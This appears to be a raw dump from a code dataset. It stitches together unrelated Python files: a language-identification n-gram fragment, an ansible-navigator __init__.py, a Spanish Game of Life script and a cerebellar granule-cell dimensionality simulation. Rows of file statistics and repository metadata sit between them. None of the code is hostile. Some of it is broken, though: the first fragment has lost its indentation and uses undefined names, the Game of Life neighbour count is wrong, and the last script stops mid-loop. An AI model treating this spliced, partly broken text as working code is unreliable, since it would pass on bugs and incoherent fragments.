header = ['م', 'ם', 'ी', 'た', 'ㅋ', 'd', 's', 'di', 'र', 'त', 'ا', 'ה', 'о', 't', 'ن', 'ा', 'ㅋㅋ', 'ว', 'की', 'י', 'w', '!', '…', 'en', 'े', 'ๆ', 'і', '?', 'ے', 'и', 'а', 'کے', '다', '는', 'T', 'ي', 'e', 'میں', 'r', 'ی', 'แล้ว', 'o', 'на', 'को', 'ר', 'RT', '。', 'و', 'ो', 'ะ', 'ه', 'е', 'i', 'я', 'n', 'a', 'de', 'ת', 'lang']
def count_Ngrams(document, N):
""" count_trigrams takes a string and returns a dictionary of the counts
of trigrams within the document. """
count_dict = dd(float)
i = 0
length = 1 - N
Ngrams = []
for word in document:
if(len(word) < N):
Ngrams.append(word)
else:
for i in range(0, len(word)-length):
Ngram = word[i:i+N]
if(Ngram not in Ngrams):
Ngrams.append(Ngram)
return Ngrams
def createVector(Ngrams):
Ngramcount = {}
notInSet = {}
for i in header[:-1]:
if i not in Ngramcount.keys():
Ngramcount[i] = 0
for i in Ngrams:
if i in Ngramcount.keys():
Ngramcount[i] += 1
else:
if i in notInSet.keys():
notInSet[i] += 1
else:
notInSet[i] = 1
vector = []
for i in header[:-1]:
frequency = Ngramcount[i]
vector.append(frequency)
return vector
def computerScores(train_data, vector):
scores = []
for lang in train_data:
score = 0
for i in range(len(lang[:-1])):
score += lang[i] * vector[i]
scores.append((score, lang[-1]))
return sorted(scores, reverse=True)
def processTest(test):
#tokenize test data
test = test.split()
#clearify test data
buffer = []
for i in test:
if ('@' not in i) and ('#' not in i) and ('http' not in i):
i = re.sub('[%s]' % re.escape(string.punctuation),'',i)
i = re.sub('\d','',i)
if i != '':
buffer.append(i)
test = buffer
#create Ngrams
Ngrams = count_Ngrams(test, N)
#create vector for test
vector = createVector(Ngrams)
#compute scores for each language
scores = computerScores(train_data, vector)
return scores
#######################################
scores = processTest(test)
for i in scores:
print(i)
| 146.377551 | 11,597 | 0.632276 | 2,845 | 14,345 | 3.191916 | 0.145518 | 0.386742 | 0.494219 | 0.544874 | 0.371325 | 0.326176 | 0.324083 | 0.24744 | 0.244797 | 0.204383 | 0 | 0.633969 | 0.145068 | 14,345 | 97 | 11,598 | 147.886598 | 0.10486 | 0.01443 | 0 | 0.073529 | 0 | 0 | 0.014556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.176471 | 0.014706 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
75f86a4e5d466bd834b97c18cf1681d258094a13 | 254 | py | Python | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | """configuration subsystem
"""
from .configurator import Configurator
from .definitions import ApplicationConfiguration
from .definitions import Constants
from .definitions import SettingsEntry
from .navigator_configuration import NavigatorConfiguration
| 31.75 | 59 | 0.866142 | 23 | 254 | 9.521739 | 0.478261 | 0.205479 | 0.287671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090551 | 254 | 7 | 60 | 36.285714 | 0.948052 | 0.090551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f9c22039404f2835280536edd02ee915bf004f45 | 7,794 | py | Python | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | 1 | 2020-08-19T17:25:22.000Z | 2020-08-19T17:25:22.000Z | celda = {
"viva": "#",
"vacia": "-"
}
def generar_tablero():
"""Genera un tablero vacio"""
n = input("introduce numero de filas: ")
m = input("introduce numero de columnas: ")
tablero = []
for i in range(n):
fila = []
for j in range(m):
fila.append(celda["vacia"])
tablero.append(fila)
return tablero, n, m
def mostrar_tablero(tablero):
"""Muestra el tablero"""
for fila in tablero:
for celda in fila:
print celda,
print ""
def dar_vida(tablero):
"""Introduce las celulas en el tablero"""
x, y = 0, 0
while y >= 0 and x >= 0:
y, x = raw_input("introduce coordenadas").split()
y = int(y)-1
x = int(x)-1
if y >= len(tablero) or x >= len(tablero[0]):
print "coordenada erronea"
else:
if y >= 0 and x >= 0:
tablero[y][x] = celda["viva"]
# def comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer):
# """Comprueba el numero de celulas vecinas"""
# merece_vivir = False
# cv = 0
# y = y
# x = x
# pre_y = y-1
# pre_x = x-1
# if y <= len(tablero)-2:
# post_y = y+1
# else:
# post_y = 0
# if x <= len(tablero[y])-2:
# post_x = x+1
# else:
# post_x = 0
# if tablero[pre_y][pre_x] == celda["viva"]:
# cv += 1
# if tablero[pre_y][x] == celda["viva"]:
# cv += 1
#
# if tablero[pre_y][post_x] == celda["viva"]:
# cv += 1
# if tablero[y][pre_x] == celda["viva"]:
# cv += 1
#
# if tablero[y][post_x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][pre_x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][post_x] == celda["viva"]:
# cv += 1
# cell = tablero[y][x]
# tablero[y][x] = "·"
# mostrar_tablero(tablero)
# tablero[y][x] = cell
# if tablero[y][x] == celda["viva"]:
# print "vecinas_para_sobrevivir:", vecinas_para_sobrevivir
# for vps in vecinas_para_sobrevivir:
# if cv == vps:
# merece_vivir = True
# print "vps", vps, "cv", cv, "cv == vps", cv == vps, "merece_vivir", merece_vivir
# if merece_vivir == False:
# tablero[y][x] = celda["vacia"]
# else:
# print "vecinas_para_nacer:", vecinas_para_nacer
# if tablero[y][x] == celda["vacia"]:
# for vpn in vecinas_para_nacer:
# if cv == vpn:
# merece_vivir = True
# print "vpn", vpn, "cv", cv, "cv == vpn", cv == vpn, "merece_vivir", merece_vivir
# if merece_vivir == True:
# tablero[y][x] = celda["viva"]
def comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer):
"""Comprueba el numero de celulas vecinas"""
merece_vivir = False
cv = 0
pre_y = y
pre_x = x
post_x = None
post_y = None
if y <= len(tablero)-2:
post_y = y+1
# else:
# post_y = 0
if x <= len(tablero[y])-2:
post_x = x+1
# else:
# post_x = 0
if tablero[pre_y][pre_x] == celda["viva"]:
cv += 1
if tablero[pre_y][x] == celda["viva"]:
cv += 1
if tablero[y][pre_x] == celda["viva"]:
cv += 1
if (post_x is None) and (post_y is None):
pass
else:
if post_x is None:
if tablero[post_y][pre_x] == celda["viva"]:
cv += 1
if tablero[post_y][x] == celda["viva"]:
cv += 1
if post_y is None:
if tablero[pre_y][post_x] == celda["viva"]:
cv += 1
if tablero[y][post_x] == celda["viva"]:
cv += 1
if (post_x is not None) and (post_y is not None):
if tablero[post_y][post_x] == celda["viva"]:
cv += 1
cell = tablero[y][x]
tablero[y][x] = "·"
mostrar_tablero(tablero)
tablero[y][x] = cell
print cv
if tablero[y][x] == celda["viva"]:
print "vecinas_para_sobrevivir:", vecinas_para_sobrevivir
for vps in vecinas_para_sobrevivir:
if cv == vps:
merece_vivir = True
print "vps", vps, "cv", cv, "cv == vps", cv == vps, "merece_vivir", merece_vivir
if merece_vivir == False:
tablero[y][x] = celda["vacia"]
else:
print "vecinas_para_nacer:", vecinas_para_nacer
if tablero[y][x] == celda["vacia"]:
for vpn in vecinas_para_nacer:
if cv == vpn:
merece_vivir = True
print "vpn", vpn, "cv", cv, "cv == vpn", cv == vpn, "merece_vivir", merece_vivir
if merece_vivir == True:
tablero[y][x] = celda["viva"]
def simular_evolucion(n_generaciones, tablero, vecinas_para_sobrevivir, vecinas_para_nacer):
for i in range(n_generaciones):
print "generacion", i+1
y = 0
for fila in tablero:
x = 0
for celda in fila:
comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer)
x += 1
y += 1
mostrar_tablero(tablero)
tablero, n, m = generar_tablero()
dar_vida(tablero)
mostrar_tablero(tablero)
vecinas_para_sobrevivir = []
for x in raw_input("Numero de celulas vecinas para sobrevivir: ").split():
if x not in vecinas_para_sobrevivir:
vecinas_para_sobrevivir.append(int(x))
vecinas_para_nacer = []
for x in raw_input("Numero de celulas vecinas para nacer: ").split():
if x not in vecinas_para_nacer:
vecinas_para_nacer.append(int(x))
n_generaciones = input("Introduce numero de generaciones a simular:")
simular_evolucion(n_generaciones, tablero, vecinas_para_sobrevivir, vecinas_para_nacer)
# def comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer):
# """Comprueba el numero de celulas vecinas"""
# merece_vivir = False
# cv = 0
# y = y-1
# x = x-1
# pre_y = y-1
# pre_x = x-1
# if y <= len(tablero)-1:
# post_y = y+1
# # else:
# # post_y = 0
# if x <= len(tablero[y])-1:
# post_x = x+1
# # else:
# # post_x = 0
# if tablero[pre_y][pre_x] == celda["viva"]:
# cv += 1
# if tablero[pre_y][x] == celda["viva"]:
# cv += 1
#
# if tablero[pre_y][post_x] == celda["viva"]:
# cv += 1
# if tablero[y][pre_x] == celda["viva"]:
# cv += 1
#
# if tablero[y][post_x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][pre_x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][x] == celda["viva"]:
# cv += 1
#
# if tablero[post_y][post_x] == celda["viva"]:
# cv += 1
# cell = tablero[y][x]
# tablero[y][x] = "·"
# mostrar_tablero(tablero)
# tablero[y][x] = cell
# if tablero[y][x] == celda["viva"]:
# print "vecinas_para_sobrevivir:", vecinas_para_sobrevivir
# for vps in vecinas_para_sobrevivir:
# if cv == vps:
# merece_vivir = True
# print "vps", vps, "cv", cv, "cv == vps", cv == vps, "merece_vivir", merece_vivir
# if merece_vivir == False:
# tablero[y][x] = celda["vacia"]
# else:
# print "vecinas_para_nacer:", vecinas_para_nacer
# if tablero[y][x] == celda["vacia"]:
# for vpn in vecinas_para_nacer:
# if cv == vpn:
# merece_vivir = True
# print "vpn", vpn, "cv", cv, "cv == vpn", cv == vpn, "merece_vivir", merece_vivir
# if merece_vivir == True:
# tablero[y][x] = celda["viva"]
| 31.427419 | 98 | 0.522068 | 1,043 | 7,794 | 3.727709 | 0.074784 | 0.10751 | 0.079733 | 0.074074 | 0.80607 | 0.784722 | 0.76749 | 0.754115 | 0.754115 | 0.750514 | 0 | 0.012409 | 0.327945 | 7,794 | 247 | 99 | 31.554656 | 0.729286 | 0.45766 | 0 | 0.201835 | 0 | 0 | 0.099899 | 0.006054 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.009174 | 0 | null | null | 0.082569 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ddeb432a71a214d522d97f58bfa0f7c25866daa9 | 23,344 | py | Python | analysis/dimensionalty_sim/run_tests_210327.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/dimensionalty_sim/run_tests_210327.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/dimensionalty_sim/run_tests_210327.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | import random
import copy
import logging
import sys
from collections import defaultdict
import itertools
from sim_lite import SimulationLite
import compress_pickle
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from neurons import GranuleCell, MossyFiber, Simulation, generate_binary_patterns, add_noise_binary_patterns, add_noise_to_core_patterns
import analysis
# logging.basicConfig(level=logging.DEBUG)
def test_similarity_by_activation_level3(
input_graph,
noise_prob=None,
activation_levels=None,
seed=0,
print_output=False,
test_len=128,
sim=None,
):
random.seed(seed)
if sim is None:
input_graph = copy.deepcopy(input_graph)
removed = input_graph.remove_empty_mfs()
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(
count=n_pattern,
# type='gaussian',
)
sim.set_failure_rate(0, seed=seed)
# if noise_probs is None:
# noise_probs = range(5, 100, 5)
# if activation_levels is None:
# activation_levels = range(5, 100, 5)
all_res = {}
for calibrate_activation_level in activation_levels:
calibrate_activation_level = calibrate_activation_level
print(f'calibrate_activation_level: {calibrate_activation_level}')
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=calibrate_activation_level)
ref_pattern = patterns[0]
sim.evaluate([ref_pattern], no_random=True)
ref_output = sim.get_grc_activities()[0]
# sim.calibrate_grc_activation_level(calibrate_activation_level)
redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_grc_activities()
voi = analysis.get_average_metric2(acts, ref_output, metric='voi')
binary_similarity = analysis.get_average_metric2(acts, ref_output, metric='binary_similarity')
hamming_distance = analysis.get_average_hamming_distance2(acts, ref_output)
normalized_mse = analysis.get_normalized_mean_squared_distance(hamming_distance/len(acts), f=calibrate_activation_level)
mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
pct_grc = int(grc_dim*1000/sim.num_grcs)/10
pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
pct_mf_dim = int(grc_dim*1000/mf_dim)/10
if print_output:
# print(f'voi: {voi}')
# print(f'binary_similarity: {binary_similarity}')
# print(f'hamming_distance: {hamming_distance}')
# print(f'normalized_mse: {normalized_mse}')
print(f'grc_pop_corr: {grc_pop_corr}')
print(f'mf_pop_corr: {mf_pop_corr}')
print(f'Dim MFs: {mf_dim}')
print(f'Dim GRCs: {grc_dim}')
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
res = {}
res['voi'] = voi
res['binary_similarity'] = binary_similarity
res['hamming_distance'] = hamming_distance
res['normalized_mse'] = normalized_mse
res['grc_pop_corr'] = grc_pop_corr
res['mf_dim'] = mf_dim
res['mf_pop_corr'] = mf_pop_corr
res['grc_dim'] = grc_dim
res['pct_grc'] = pct_grc
res['pct_mfs'] = pct_mfs
res['pct_mf_dim'] = pct_mf_dim
res['num_grcs'] = sim.num_grcs
res['num_mfs'] = sim.num_mfs
all_res[calibrate_activation_level] = res
return all_res
def test_similarity_by_activation_level2(
input_graph,
noise_prob=None,
activation_levels=None,
seed=0,
print_output=False,
test_len=128,
):
input_graph = copy.deepcopy(input_graph)
removed = input_graph.remove_empty_mfs()
random.seed(seed)
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(
count=n_pattern,
# type='gaussian',
)
# if noise_probs is None:
# noise_probs = range(5, 100, 5)
# if activation_levels is None:
# activation_levels = range(5, 100, 5)
all_res = {}
for calibrate_activation_level in activation_levels:
calibrate_activation_level = calibrate_activation_level
print(f'calibrate_activation_level: {calibrate_activation_level}')
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=calibrate_activation_level)
ref_pattern = patterns[0]
sim.evaluate([ref_pattern], no_random=True)
ref_output = sim.get_grc_activities()
# sim.calibrate_grc_activation_level(calibrate_activation_level)
redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_grc_activities()
voi = analysis.get_average_metric(acts, ref_output, metric='voi')
binary_similarity = analysis.get_average_metric(acts, ref_output, metric='binary_similarity')
hamming_distance = analysis.get_average_hamming_distance(acts, ref_output)
normalized_mse = analysis.get_normalized_mean_squared_distance(hamming_distance/len(acts), f=calibrate_activation_level)
mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
pct_grc = int(grc_dim*1000/sim.num_grcs)/10
pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
pct_mf_dim = int(grc_dim*1000/mf_dim)/10
if print_output:
# print(f'voi: {voi}')
# print(f'binary_similarity: {binary_similarity}')
# print(f'hamming_distance: {hamming_distance}')
# print(f'normalized_mse: {normalized_mse}')
print(f'grc_pop_corr: {grc_pop_corr}')
print(f'mf_pop_corr: {mf_pop_corr}')
print(f'Dim MFs: {mf_dim}')
print(f'Dim GRCs: {grc_dim}')
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
res = {}
res['voi'] = voi
res['binary_similarity'] = binary_similarity
res['hamming_distance'] = hamming_distance
res['normalized_mse'] = normalized_mse
res['grc_pop_corr'] = grc_pop_corr
res['mf_dim'] = mf_dim
res['mf_pop_corr'] = mf_pop_corr
res['grc_dim'] = grc_dim
res['pct_grc'] = pct_grc
res['pct_mfs'] = pct_mfs
res['pct_mf_dim'] = pct_mf_dim
res['num_grcs'] = sim.num_grcs
res['num_mfs'] = sim.num_mfs
all_res[calibrate_activation_level] = res
return all_res
def test_similarity_by_noise(
input_graph,
noise_probs=None,
activation_level=None,
seed=0,
print_output=False,
test_len=128,
):
input_graph = copy.deepcopy(input_graph)
removed = input_graph.remove_empty_mfs()
random.seed(seed)
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(
count=n_pattern,
# type='gaussian',
)
if noise_probs is None:
noise_probs = range(5, 100, 5)
all_res = {}
print(f'activation_level: {activation_level}')
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=activation_level)
ref_pattern = patterns[0]
sim.evaluate([ref_pattern], no_random=True)
ref_output = sim.get_grc_activities()
for noise_prob in noise_probs:
print(noise_prob)
redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_grc_activities()
voi = analysis.get_average_metric(acts, ref_output, metric='voi')
binary_similarity = analysis.get_average_metric(acts, ref_output, metric='binary_similarity')
hamming_distance = analysis.get_average_hamming_distance(acts, ref_output)
normalized_mse = analysis.get_normalized_mean_squared_distance(hamming_distance/len(acts), f=activation_level)
mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
pct_grc = int(grc_dim*1000/sim.num_grcs)/10
pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
pct_mf_dim = int(grc_dim*1000/mf_dim)/10
if print_output:
# print(f'voi: {voi}')
# print(f'binary_similarity: {binary_similarity}')
# print(f'hamming_distance: {hamming_distance}')
# print(f'normalized_mse: {normalized_mse}')
print(f'grc_pop_corr: {grc_pop_corr}')
print(f'mf_pop_corr: {mf_pop_corr}')
print(f'Dim MFs: {mf_dim}')
print(f'Dim GRCs: {grc_dim}')
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
res = {}
res['voi'] = voi
res['binary_similarity'] = binary_similarity
res['hamming_distance'] = hamming_distance
res['normalized_mse'] = normalized_mse
res['grc_pop_corr'] = grc_pop_corr
res['mf_dim'] = mf_dim
res['mf_pop_corr'] = mf_pop_corr
res['grc_dim'] = grc_dim
res['pct_grc'] = pct_grc
res['pct_mfs'] = pct_mfs
res['pct_mf_dim'] = pct_mf_dim
res['num_grcs'] = sim.num_grcs
res['num_mfs'] = sim.num_mfs
all_res[noise_prob] = res
return all_res
def add_random_failures(acts, failure_rate):
indices = [k for k in range(len(acts[0]))]
random.shuffle(indices)
fail_idx = indices[0:int(failure_rate*len(indices))]
failed_acts = copy.deepcopy(acts)
for a in failed_acts:
for i in fail_idx:
a[i] = 0
return failed_acts
def test_stability_of_core_inputs_across_noise(
input_graph,
activation_level,
noise_probs,
# failure_rates,
seed=0,
test_len=512,
core_noise=True,
print_output=True,
scaled_noise=False,
sim=None,
):
random.seed(seed)
if sim is None:
input_graph = copy.deepcopy(input_graph)
removed = input_graph.remove_empty_mfs()
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
# n_pattern = 512 # 309
patterns = sim.generate_patterns(count=n_pattern)
sim.set_failure_rate(0, seed=seed)
# print(patterns); asdf
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=activation_level)
test_patterns = [patterns[0]]
all_res = {}
for noise in noise_probs:
print(f'noise={noise}')
if core_noise:
redundant_patterns = add_noise_to_core_patterns(test_patterns, prob=noise, n=test_len, seed=seed)
else:
redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=test_len, seed=seed, scaled_noise=scaled_noise)
# redundant_patterns = add_noise_to_core_patterns(test_patterns, prob=noise, n=2)
# for p in redundant_patterns[0:2]:
# print(p[0][0:20])
# asdf
ref_pattern = patterns[0]
sim.evaluate([ref_pattern], no_random=True)
ref_output = sim.get_grc_activities()[0]
ref_output = copy.deepcopy(ref_output)
sim.evaluate(redundant_patterns, no_random=True)
mf_acts = sim.get_mfs_activities()
# for act in mf_acts[0:2]:
# print(act[0:18])
mf_dim, mf_pop_corr = analysis.get_dim_from_acts(mf_acts, ret_population_correlation=True)
grc_acts = sim.get_grc_activities()
# for act in grc_acts[0:2]:
# print(act[0:37])
# print(f'ref_output:\n{ref_output[0:37]}')
# print(f'ref_pattern:\n{ref_pattern[0][0:37]}')
# print(f'redundant_patterns:\n{redundant_patterns[0][0][0:37]}')
# print(f'test_patterns:\n{test_patterns[0][0][0:37]}')
# asdf
voi = analysis.get_average_metric2(grc_acts, ref_output, metric='voi')
binary_similarity = analysis.get_average_metric2(grc_acts, ref_output, metric='binary_similarity')
hamming_distance = analysis.get_average_hamming_distance2(grc_acts, ref_output)
normalized_mse = analysis.get_normalized_mean_squared_distance(hamming_distance/len(grc_acts), f=activation_level)
grc_dim, grc_pop_corr = analysis.get_dim_from_acts(grc_acts, ret_population_correlation=True)
pct_grc = int(grc_dim*1000/sim.num_grcs)/10
pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
pct_mf_dim = int(grc_dim*1000/mf_dim)/10
if print_output:
# print(f'voi: {voi}')
# print(f'binary_similarity: {binary_similarity}')
# print(f'hamming_distance: {hamming_distance}')
# print(f'normalized_mse: {normalized_mse}')
print(f'grc_pop_corr: {grc_pop_corr}')
print(f'mf_pop_corr: {mf_pop_corr}')
print(f'Dim MFs: {mf_dim}')
print(f'Dim GRCs: {grc_dim}')
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
res = {}
res['voi'] = voi
res['binary_similarity'] = binary_similarity
res['hamming_distance'] = hamming_distance
res['normalized_mse'] = normalized_mse
res['grc_pop_corr'] = grc_pop_corr
res['mf_dim'] = mf_dim
res['mf_pop_corr'] = mf_pop_corr
res['grc_dim'] = grc_dim
res['pct_grc'] = pct_grc
res['pct_mfs'] = pct_mfs
res['pct_mf_dim'] = pct_mf_dim
res['num_grcs'] = sim.num_grcs
res['num_mfs'] = sim.num_mfs
all_res[noise] = res
return all_res
def test_dim_similar_input_with_failure(
input_graph,
activation_level,
noise_probs,
failure_rates,
seed=0,
):
removed = input_graph.remove_empty_mfs()
print(f'Removed {len(removed)} mfs')
random.seed(seed)
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(count=n_pattern)
# print(patterns); asdf
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=activation_level)
test_patterns = [patterns[0]]
for noise in noise_probs:
print(f'noise={noise}')
redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
sim.evaluate(redundant_patterns, no_random=True)
acts = sim.get_mfs_activities()
# for act in acts[0:10]:
# print(act[0:20])
mf_dim = analysis.get_dim_from_acts(acts)
print(f'Dim MFs: {mf_dim}')
grc_acts = sim.get_grc_activities()
# for act in grc_acts[0:10]:
# print(act[0:20])
grc_dim = analysis.get_dim_from_acts(grc_acts)
print(f'Dim GRCs: {grc_dim}')
pct_grc = int(grc_dim*1000/sim.num_grcs)/10
pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
pct_mf_dim = int(grc_dim*1000/mf_dim)/10
print(f' = {pct_mfs}% of MFs')
print(f' = {pct_mf_dim}% of MF dim')
print(f' = {pct_grc}% of GrCs')
for failure_rate in failure_rates:
print(f'unreliability={failure_rate}')
grc_acts1 = add_random_failures(grc_acts, failure_rate)
grc_dim1 = analysis.get_dim_from_acts(grc_acts1)
print(f' = {grc_dim1:.2f}, {grc_dim1/grc_dim*100:.2f}% of original dimensionality')
def measure_hamming_similarity(vec0, vec1):
s = 0
for i, j in zip(vec0, vec1):
if i == j:
s += 1
return s / len(vec0)
def random_combination(iterable, r):
"Random selection from itertools.combinations(iterable, r)"
pool = tuple(iterable)
n = len(pool)
indices = sorted(random.sample(range(n), r))
return tuple(pool[i] for i in indices)
import scipy
import scipy.stats
def measure_correlation_by_sharing(
input_graph, act_patterns, save_fname=None):
simlite_graph = SimulationLite(input_graph)
pos = 0
grcs_claws = []
mf_to_grcs = defaultdict(set)
for grc_id, dendrite_count in enumerate(simlite_graph.dendrite_counts):
claws = []
for j in range(dendrite_count):
mf_id = simlite_graph.dendrite_mf_map[pos]
pos += 1
claws.append(mf_id)
mf_to_grcs[mf_id].add(grc_id)
grcs_claws.append(set(claws))
nshares = defaultdict(int)
nshare_pairs = defaultdict(list)
counted = set()
for mf_id, grcs in mf_to_grcs.items():
for pair in itertools.combinations(grcs, 2):
if pair in counted:
continue
nshare = len(grcs_claws[pair[0]] & grcs_claws[pair[1]])
nshares[nshare] += 1
if nshare > 0:
nshare_pairs[nshare].append(pair)
counted.add(pair)
counted.add((pair[1], pair[0]))
for n in sorted(nshares.keys()):
print(f'{n}: {nshares[n]/len(simlite_graph.dendrite_counts)}')
nshare_raw_data_similarity = defaultdict(list)
nshare_raw_data_corr = defaultdict(list)
nshare = 0
# for pair in random_combination(range(len(grcs_claws)), 2):
n_samples = len(grcs_claws)*10
combinations = itertools.combinations(range(len(grcs_claws)), 2)
sim_hist = defaultdict(int)
cor_hist = defaultdict(int)
for pair in random_combination(combinations, n_samples):
# print(pair)
nshare = len(grcs_claws[pair[0]] & grcs_claws[pair[1]])
if nshare == 0:
vec0 = act_patterns[:, pair[0]]
vec1 = act_patterns[:, pair[1]]
similarity = measure_hamming_similarity(vec0, vec1)
corr = scipy.stats.spearmanr(vec0, vec1)[0]
nshare_raw_data_similarity[nshare].append(similarity)
nshare_raw_data_corr[nshare].append(corr)
sim_hist[int(similarity*100)] += 1
for n in sorted(sim_hist.keys()):
print(f'{n} {sim_hist[n]}')
print()
for nshare in [1, 2, 3]:
print(f'measuring {nshare}-share, {nshares[nshare]} pairs')
sim_hist = defaultdict(int)
for pair in nshare_pairs[nshare]:
vec0 = act_patterns[:, pair[0]]
vec1 = act_patterns[:, pair[1]]
similarity = measure_hamming_similarity(vec0, vec1)
nshare_raw_data_similarity[nshare].append(similarity)
corr = scipy.stats.spearmanr(vec0, vec1)[0]
nshare_raw_data_corr[nshare].append(corr)
sim_hist[int(similarity*100)] += 1
for n in sorted(sim_hist.keys()):
print(f'{n} {sim_hist[n]}')
# for n in sorted(sim_hist.keys()):
# print(n, end=',')
# print()
# for n in sorted(sim_hist.keys()):
# print(sim_hist[n], end=',')
print()
if save_fname:
nshare_raw_data_similarity = dict(nshare_raw_data_similarity)
print(f'Saving to {save_fname}')
compress_pickle.dump(
(nshare_raw_data_similarity, nshare_raw_data_corr)
, save_fname)
def test_dim_similar_input_and_correlation_by_sharing(
input_graph,
noise_probs,
activation_level=.3,
seed=0,
save_fname=None,
):
removed = input_graph.remove_empty_mfs()
print(f'Removed {len(removed)} mfs')
random.seed(seed)
sim = Simulation(
input_graph=input_graph,
)
n_pattern = 1024*4 # 309
patterns = sim.generate_patterns(count=n_pattern)
# print(patterns); asdf
sim.evaluate(patterns, no_random=True,
calibrate_activation_level=activation_level)
test_patterns = [patterns[0]]
for noise in noise_probs:
print(f'noise={noise}')
